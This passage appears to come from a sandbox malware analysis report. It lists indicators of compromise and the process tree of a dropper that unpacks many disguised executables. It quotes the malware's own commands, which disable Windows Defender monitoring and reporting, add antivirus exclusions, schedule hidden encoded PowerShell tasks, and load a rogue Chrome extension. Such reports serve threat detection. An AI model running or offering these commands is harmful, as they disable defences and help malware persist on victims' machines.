9efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Sat17385fe122c.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53	Sat17385fe122c.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeSat172ee445a2.exe

pid	process
1680	powershell.exe
1680	powershell.exe
2208	powershell.exe
2208	powershell.exe
1680	powershell.exe
2208	powershell.exe
1072	Sat172ee445a2.exe
1072	Sat172ee445a2.exe
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032
1032

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Sat172ee445a2.exe

pid process

1072 Sat172ee445a2.exe

pid	process
1072	Sat172ee445a2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Sat17e037bb5cb1914dd.exeSat17385fe122c.exepowershell.exepowershell.exeSat175bcb721ec3.exetaskkill.exetaskkill.exeFenix_11.bmp.exewam.exe.exe

description	pid	process
Token: SeDebugPrivilege	4020	Sat17e037bb5cb1914dd.exe
Token: SeCreateTokenPrivilege	2012	Sat17385fe122c.exe
Token: SeAssignPrimaryTokenPrivilege	2012	Sat17385fe122c.exe
Token: SeLockMemoryPrivilege	2012	Sat17385fe122c.exe
Token: SeIncreaseQuotaPrivilege	2012	Sat17385fe122c.exe
Token: SeMachineAccountPrivilege	2012	Sat17385fe122c.exe
Token: SeTcbPrivilege	2012	Sat17385fe122c.exe
Token: SeSecurityPrivilege	2012	Sat17385fe122c.exe
Token: SeTakeOwnershipPrivilege	2012	Sat17385fe122c.exe
Token: SeLoadDriverPrivilege	2012	Sat17385fe122c.exe
Token: SeSystemProfilePrivilege	2012	Sat17385fe122c.exe
Token: SeSystemtimePrivilege	2012	Sat17385fe122c.exe
Token: SeProfSingleProcessPrivilege	2012	Sat17385fe122c.exe
Token: SeIncBasePriorityPrivilege	2012	Sat17385fe122c.exe
Token: SeCreatePagefilePrivilege	2012	Sat17385fe122c.exe
Token: SeCreatePermanentPrivilege	2012	Sat17385fe122c.exe
Token: SeBackupPrivilege	2012	Sat17385fe122c.exe
Token: SeRestorePrivilege	2012	Sat17385fe122c.exe
Token: SeShutdownPrivilege	2012	Sat17385fe122c.exe
Token: SeDebugPrivilege	2012	Sat17385fe122c.exe
Token: SeAuditPrivilege	2012	Sat17385fe122c.exe
Token: SeSystemEnvironmentPrivilege	2012	Sat17385fe122c.exe
Token: SeChangeNotifyPrivilege	2012	Sat17385fe122c.exe
Token: SeRemoteShutdownPrivilege	2012	Sat17385fe122c.exe
Token: SeUndockPrivilege	2012	Sat17385fe122c.exe
Token: SeSyncAgentPrivilege	2012	Sat17385fe122c.exe
Token: SeEnableDelegationPrivilege	2012	Sat17385fe122c.exe
Token: SeManageVolumePrivilege	2012	Sat17385fe122c.exe
Token: SeImpersonatePrivilege	2012	Sat17385fe122c.exe
Token: SeCreateGlobalPrivilege	2012	Sat17385fe122c.exe
Token: 31	2012	Sat17385fe122c.exe
Token: 32	2012	Sat17385fe122c.exe
Token: 33	2012	Sat17385fe122c.exe
Token: 34	2012	Sat17385fe122c.exe
Token: 35	2012	Sat17385fe122c.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	3440	Sat175bcb721ec3.exe
Token: SeDebugPrivilege	3116	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeShutdownPrivilege	1032
Token: SeCreatePagefilePrivilege	1032
Token: SeDebugPrivilege	3048	Fenix_11.bmp.exe
Token: SeDebugPrivilege	4252	wam.exe.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4156 wrote to memory of 4780	4156	F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exe	setup_install.exe
PID 4156 wrote to memory of 4780	4156	F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exe	setup_install.exe
PID 4156 wrote to memory of 4780	4156	F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exe	setup_install.exe
PID 4780 wrote to memory of 3344	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3344	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3344	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 4792	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 4792	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 4792	4780	setup_install.exe	cmd.exe
PID 4792 wrote to memory of 2208	4792	cmd.exe	powershell.exe
PID 4792 wrote to memory of 2208	4792	cmd.exe	powershell.exe
PID 4792 wrote to memory of 2208	4792	cmd.exe	powershell.exe
PID 3344 wrote to memory of 1680	3344	cmd.exe	powershell.exe
PID 3344 wrote to memory of 1680	3344	cmd.exe	powershell.exe
PID 3344 wrote to memory of 1680	3344	cmd.exe	powershell.exe
PID 4780 wrote to memory of 4608	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 4608	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 4608	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3480	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3480	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3480	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 1396	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 1396	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 1396	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3324	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3324	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3324	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3796	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3796	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3796	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 640	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 640	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 640	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 2604	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 2604	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 2604	4780	setup_install.exe	cmd.exe
PID 3480 wrote to memory of 2496	3480	cmd.exe	Sat1716af8826a01bf4a.exe
PID 3480 wrote to memory of 2496	3480	cmd.exe	Sat1716af8826a01bf4a.exe
PID 3480 wrote to memory of 2496	3480	cmd.exe	Sat1716af8826a01bf4a.exe
PID 4608 wrote to memory of 4020	4608	cmd.exe	Sat17e037bb5cb1914dd.exe
PID 4608 wrote to memory of 4020	4608	cmd.exe	Sat17e037bb5cb1914dd.exe
PID 4780 wrote to memory of 4084	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 4084	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 4084	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 5016	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 5016	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 5016	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3488	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3488	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 3488	4780	setup_install.exe	cmd.exe
PID 1396 wrote to memory of 2408	1396	cmd.exe	Sat1787f49a38.exe
PID 1396 wrote to memory of 2408	1396	cmd.exe	Sat1787f49a38.exe
PID 1396 wrote to memory of 2408	1396	cmd.exe	Sat1787f49a38.exe
PID 5016 wrote to memory of 2012	5016	cmd.exe	Sat17385fe122c.exe
PID 5016 wrote to memory of 2012	5016	cmd.exe	Sat17385fe122c.exe
PID 5016 wrote to memory of 2012	5016	cmd.exe	Sat17385fe122c.exe
PID 3324 wrote to memory of 1072	3324	cmd.exe	Sat172ee445a2.exe
PID 3324 wrote to memory of 1072	3324	cmd.exe	Sat172ee445a2.exe
PID 3324 wrote to memory of 1072	3324	cmd.exe	Sat172ee445a2.exe
PID 3796 wrote to memory of 4352	3796	cmd.exe	Sat172822ff563b5326.exe
PID 3796 wrote to memory of 4352	3796	cmd.exe	Sat172822ff563b5326.exe
PID 3796 wrote to memory of 4352	3796	cmd.exe	Sat172822ff563b5326.exe
PID 4780 wrote to memory of 4900	4780	setup_install.exe	cmd.exe
PID 4780 wrote to memory of 4900	4780	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exe
"C:\Users\Admin\AppData\Local\Temp\F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4156

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
3⤵
- Suspicious use of WriteProcessMemory
PID:3344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
3⤵
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat17e037bb5cb1914dd.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4608

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17e037bb5cb1914dd.exe
Sat17e037bb5cb1914dd.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat1716af8826a01bf4a.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3480

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat1716af8826a01bf4a.exe
Sat1716af8826a01bf4a.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:2496

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat1787f49a38.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1396

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat1787f49a38.exe
Sat1787f49a38.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:2408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat172ee445a2.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3324

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat172ee445a2.exe
Sat172ee445a2.exe
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat17fc809274f.exe
3⤵
PID:2604

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17fc809274f.exe
Sat17fc809274f.exe
4⤵
- Executes dropped EXE
PID:3572

C:\Users\Admin\AppData\Local\Temp\is-3HIV4.tmp\Sat17fc809274f.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3HIV4.tmp\Sat17fc809274f.tmp" /SL5="$701EA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17fc809274f.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:3104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat17777767f9d8b1.exe
3⤵
PID:4084

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17777767f9d8b1.exe
Sat17777767f9d8b1.exe
4⤵
- Executes dropped EXE
PID:948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat17bc816ccde620e.exe
3⤵
PID:640

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17bc816ccde620e.exe
Sat17bc816ccde620e.exe
4⤵
PID:1000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat172822ff563b5326.exe /mixtwo
3⤵
- Suspicious use of WriteProcessMemory
PID:3796

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat172822ff563b5326.exe
Sat172822ff563b5326.exe /mixtwo
4⤵
- Executes dropped EXE
PID:4352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat17385fe122c.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:5016

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17385fe122c.exe
Sat17385fe122c.exe
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat174f9479fae9649b.exe
3⤵
PID:3488

C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat174f9479fae9649b.exe
Sat174f9479fae9649b.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
PID:1316

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
5⤵
- Executes dropped EXE
PID:1240

C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe"
5⤵
- Executes dropped EXE
PID:644

C:\Users\Admin\Documents\5CmsMf7YcygjqefEw3W5v_L1.exe
"C:\Users\Admin\Documents\5CmsMf7YcygjqefEw3W5v_L1.exe"
6⤵
PID:1200

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
7⤵
PID:4220

C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe"
7⤵
PID:2080

C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"
7⤵
PID:4588

C:\Windows\SysWOW64\ftp.exe
ftp -?
8⤵
PID:884

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Esistenza.wbk
8⤵
PID:5208

C:\Windows\SysWOW64\cmd.exe
cmd
9⤵
PID:5980

C:\Users\Admin\Pictures\Adobe Films\utube2005.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\utube2005.bmp.exe"
7⤵
PID:4740

C:\Users\Admin\AppData\Local\Temp\7zS1FA8.tmp\Install.exe
.\Install.exe
8⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\7zS2BAF.tmp\Install.exe
.\Install.exe /S /site_id "525403"
9⤵
PID:4288

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
10⤵
PID:3076

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
11⤵
PID:5480

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
12⤵
PID:5912

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
12⤵
PID:5580

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
10⤵
PID:5196

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
11⤵
PID:5516

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
12⤵
PID:5880

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
12⤵
PID:4368

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gSvQbYTYU" /SC once /ST 03:19:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
10⤵
- Creates scheduled task(s)
PID:5640

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gSvQbYTYU"
10⤵
PID:5996

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gSvQbYTYU"
10⤵
PID:1524

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqKmJhnTVzvUlyJoNz" /SC once /ST 04:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AxCXTNZlIUQioadHG\jcquqnpMowPguoR\sRzoyxJ.exe\" B6 /site_id 525403 /S" /V1 /F
10⤵
- Creates scheduled task(s)
PID:5340

C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe"
7⤵
PID:1812

C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe"
7⤵
PID:4124

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\OmlJKV7Z.cpL",
8⤵
PID:4204

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OmlJKV7Z.cpL",
9⤵
PID:3168

C:\Users\Admin\Pictures\Adobe Films\random.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\random.exe.exe"
7⤵
PID:2776

C:\Users\Admin\Pictures\Adobe Films\random.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\random.exe.exe" -h
8⤵
PID:4448

C:\Users\Admin\Pictures\Adobe Films\download2.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\download2.exe.exe"
7⤵
PID:2344

C:\Users\Admin\AppData\Local\Temp\InvisBrowser45856.exe
"C:\Users\Admin\AppData\Local\Temp\InvisBrowser45856.exe"
8⤵
PID:3796

C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe
"C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe"
8⤵
PID:5016

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:5216

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:5868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
9⤵
PID:5752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeadc54f50,0x7ffeadc54f60,0x7ffeadc54f70
10⤵
PID:5772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,4538455190659551651,15877419111523358600,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1736 /prefetch:8
10⤵
PID:4712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,4538455190659551651,15877419111523358600,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1644 /prefetch:2
10⤵
PID:2608

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
8⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
9⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\setup331.exe
"C:\Users\Admin\AppData\Local\Temp\setup331.exe"
8⤵
PID:2684

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /Y .\QyVU.OI
9⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\lj.exe
"C:\Users\Admin\AppData\Local\Temp\lj.exe"
8⤵
PID:5224

C:\Users\Admin\AppData\Local\Temp\lj.exe
"C:\Users\Admin\AppData\Local\Temp\lj.exe" -h
9⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
8⤵
PID:5320

C:\Users\Admin\AppData\Local\Temp\is-D13PM.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D13PM.tmp\setup.tmp" /SL5="$302AE,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe"
9⤵
PID:5568

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
10⤵
PID:5200

C:\Users\Admin\AppData\Local\Temp\is-12S31.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-12S31.tmp\setup.tmp" /SL5="$D0042,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
11⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\rtst1077.exe
"C:\Users\Admin\AppData\Local\Temp\rtst1077.exe"
8⤵
PID:5464

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5464 -s 900
9⤵
- Program crash
PID:3696

C:\Users\Admin\AppData\Local\Temp\mjk_tyi.exe
"C:\Users\Admin\AppData\Local\Temp\mjk_tyi.exe"
8⤵
PID:5596

C:\Users\Admin\AppData\Local\Temp\inst002.exe
"C:\Users\Admin\AppData\Local\Temp\inst002.exe"
8⤵
PID:5716

C:\Users\Admin\AppData\Local\Temp\pregmatch-1.exe
"C:\Users\Admin\AppData\Local\Temp\pregmatch-1.exe"
8⤵
PID:5828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Roaming\kebeivfdnuwj"
9⤵
PID:5892

C:\Program Files\Google\Chrome\Application\chrome.exe
